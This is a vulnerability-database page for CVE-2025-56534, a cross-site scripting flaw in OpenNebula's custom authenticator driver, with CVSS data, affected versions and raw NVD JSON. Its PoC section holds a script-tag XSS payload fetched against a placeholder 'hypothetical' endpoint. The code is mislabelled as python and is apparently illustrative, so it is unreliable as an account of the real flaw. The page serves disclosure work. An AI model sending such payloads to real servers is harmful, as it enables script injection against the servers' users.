Security Vulnerability Report
中文
CVE-2025-56534 CVSS 6.1 MEDIUM

CVE-2025-56534

Published: 2026-04-29 16:16:21
Last Modified: 2026-04-30 20:09:13

Description

A cross-site scripting (XSS) vulnerability in the custom authenticator driver of opennebula v6.10.0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opennebula:opennebula:*:*:*:*:*:*:*:* - VULNERABLE
OpenNebula v6.10.0.1
OpenNebula v6.10.0
OpenNebula < 7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2025-56534 Demonstrates payload injection into the custom authenticator driver --> <script> // Example payload to execute JavaScript in victim's browser var payload = '"><script>alert("CVE-2025-56534 - XSS Verified")</script>'; // Hypothetical vulnerable endpoint in the authenticator driver var targetUrl = 'http://target-opennebula-server/auth/custom'; // Simulate sending a crafted request (e.g., via curl or reflected parameter) // In a real attack, this URL would be sent to the victim console.log('Injecting payload into: ' + targetUrl); // If stored, the payload would be saved via a POST request // If reflected, it would be part of the URL query parameter fetch(targetUrl + '?driver_config=' + encodeURIComponent(payload)) .then(response => response.text()) .then(data => console.log(data)); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56534", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:21.477", "lastModified": "2026-04-30T20:09:13.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A cross-site scripting (XSS) vulnerability in the custom authenticator driver of opennebula v6.10.0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennebula:opennebula:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "EAB8C708-4DC1-4708-897B-86FD9AAA65EE"}]}]}], "references": [{"url": "https://github.com/MarkArtamonov/OpenNebula-CVE-2025-56534", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://opennebula.io/opennebula-7/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/MarkArtamonov/OpenNebula-CVE-2025-56534", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}